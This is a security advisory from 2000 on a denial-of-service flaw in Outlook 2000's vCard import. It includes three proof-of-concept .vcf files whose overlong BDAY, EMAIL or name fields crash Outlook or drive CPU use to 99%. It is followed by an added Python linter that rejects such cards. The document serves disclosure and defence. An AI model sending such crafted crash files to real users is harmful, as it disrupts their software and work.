Source: securityvulns (SECURITYVULNS:DOC:678)
Published: Sep 14, 2000 - 12:00 a.m.

vCard DoS on Outlook 2000

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Vulnerability in vCard import in Outlook 2000
Released: August 30, 2000

Summary

Under certain conditions, excessively long or malformed fields in a
vCard (.vcf) file can cause Microsoft Outlook 2000 to either
overflow or excessively utilize system resources.

Background

The specifications regarding vCard MIME types and field contents can
be found in RFCs 2425 and 2426.

Although RFC 2426 section 2.6 specifically requires lines longer than
75 characters to be folded as defined in [MIME-DIR], it appears
Outlook does not support line folding, and will attempt to import
any field in the file as one value, even if it is several pages long
or (in one case) overflows a data field within Outlook.

The effect this unlimited import attempt has on Outlook 2000 varies
between field types. Some fields will cause Outlook to consume
nearly all CPU time, and certain others (especially date/revision
fields and e-mail fields) will cause Outlook to terminate
immediately due to an overflow.

Severity

Outlook 2000 does not attempt to open and import a .vcf file that a
user receives via e-mail without prompting the user first. However,
vCard files are extremely common, and many users have trained
themselves to ignore the warning dialog box.

Outlook does, however, open a vCard file with no questions asked if
the user saves it to a directory and double-clicks it from Windows
Explorer. In this situation, the vCard is processed directly with no
warning or status messages displayed to the user.

Affected Configurations

Microsoft Outlook 2000 was the only platform tested (on Windows NT
4.0 Workstation, Service Pack 6a+hotfixes).

Affected fields in vCard file causing an overflow:

    • email:
    • bday; value=date (as low as 52 characters of form YYYY-MM-D(60))

Affected fields in vCard file causing excessive CPU utilization:

    • name:
    • nickname:
    • fn:
    • title:
    • title;language=de;value=text:
    • tel:
    • tel;<label>:
    • tel;<label>,<label>:

Fields which do not appear to be affected:

    • note:

Fields which do not appear to be supported:

    • any fields which continue on the next line or have defined newlines
      per RFC-2425
    • key:
    • o:

No other fields were tested.

Examples

The following examples will cause the advertised behavior.

1) A modification of the "bday" field to extend beyond 55 characters.
This example appears to be the smallest amount of text required to
elicit the symptom. This example will cause Outlook 2000 to overflow
and terminate.

BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915130848273492749723947923749273942394792734972394729374927
4982739472937492873
EMAIL;PREF;INTERNET:[email protected]
REV:20000830T191121Z
END:VCARD

2) A modification of the "e-mail" field with a large amount of text
data masquerading as an e-mail address. This example will cause
Outlook 2000 to overflow and terminate.

BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:[email protected]
.possible.sadsack.nothing.doing.is.an.overflow.possible.

<content clipped for brevity - envision lots of text here>

.sadsack.nothing.doing.is.an.overflow.possible.com
REV:20000830T191121Z
END:VCARD

3) A modification of the "N" or "name" field with a large amount of
text will not cause Outlook to terminate, but will increase
Outlook's CPU utilization to 99%.

BEGIN:VCARD
VERSION:2.1
N:Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger Meister

<content clipped for brevity - envision lots of text here>

Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger MeisterBerger MeisterBerger Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:[email protected]
REV:20000830T191121Z
END:VCARD

Resolution

None at present, other than to disassociate the .vcf extension from
Outlook. There may be more fields affected – these are merely the
initially tested ones.

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.1

iQA/AwUBOa1u3MZCl66UabcJEQJADgCfUY+6ZlnpsRevurebbD/M1XrlMfIAn1TO
LSZIBp6xoMPl4Tc5unZeICka
=N+p4
-----END PGP SIGNATURE-----
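
The Background section describes a reader that ignores RFC 2425 line folding and imports values of any length. As an added example (not part of the original advisory and not Microsoft's code), the following gateway-side check unfolds a .vcf body and rejects unfolded long lines, oversized values and malformed BDAY/REV dates before a client sees the file; the function names, the length caps and the sample cards are assumptions made for illustration.

```python
import re

MAX_LINE = 75     # physical line length after which RFC 2426 s2.6 expects folding
MAX_VALUE = 1024  # assumed cap on any unfolded value (policy choice, not from the RFC)
FIELD_CAPS = {"EMAIL": 254, "BDAY": 25, "REV": 25}  # assumed per-field caps
DATE_RE = re.compile(r"^\d{4}-?\d{2}-?\d{2}(T[\d:.,]+(Z|[+-]\d{2}:?\d{2})?)?$")

def unfold(text):
    """RFC 2425 unfolding: drop each line break that is followed by a space or tab."""
    return re.sub(r"\r?\n[ \t]", "", text).splitlines()

def lint_vcard(text):
    """Return (field, reason) findings for one .vcf body; an empty list means pass."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if len(line) > MAX_LINE:
            findings.append((f"line {n}", f"{len(line)} chars without folding"))
    for line in unfold(text):
        if not line.strip():
            continue
        if ":" not in line:
            findings.append(("?", "continuation line without RFC 2425 folding"))
            continue
        head, value = line.split(":", 1)
        name = head.split(";", 1)[0].strip().upper()
        cap = FIELD_CAPS.get(name, MAX_VALUE)
        if len(value) > cap:
            findings.append((name, f"value of {len(value)} chars exceeds cap {cap}"))
        elif name in ("BDAY", "REV") and not DATE_RE.match(value):
            findings.append((name, "not a date or date-time"))
    return findings

# Constructed sample inputs (not taken from the advisory).
GOOD = ("BEGIN:VCARD\r\nVERSION:3.0\r\nFN:Meister Berger\r\n"
        "NOTE:The Mayor of the great city of Goerlitz in the great\r\n"
        "  country of Germany.\r\nBDAY:1963-09-15\r\nREV:20000830T191121Z\r\n"
        "END:VCARD\r\n")
BAD = ("BEGIN:VCARD\r\nVERSION:3.0\r\nN:" + "Berger Meister" * 400 + "\r\n"
       "BDAY:" + "1963091513" * 6 + "\r\nEND:VCARD\r\n")

if __name__ == "__main__":
    for label, card in (("GOOD", GOOD), ("BAD", BAD)):
        print(label, lint_vcard(card))
```

vCard 2.1 quoted-printable soft line breaks (a trailing "=") are not decoded here, so such continuations are reported as unfolded lines rather than joined.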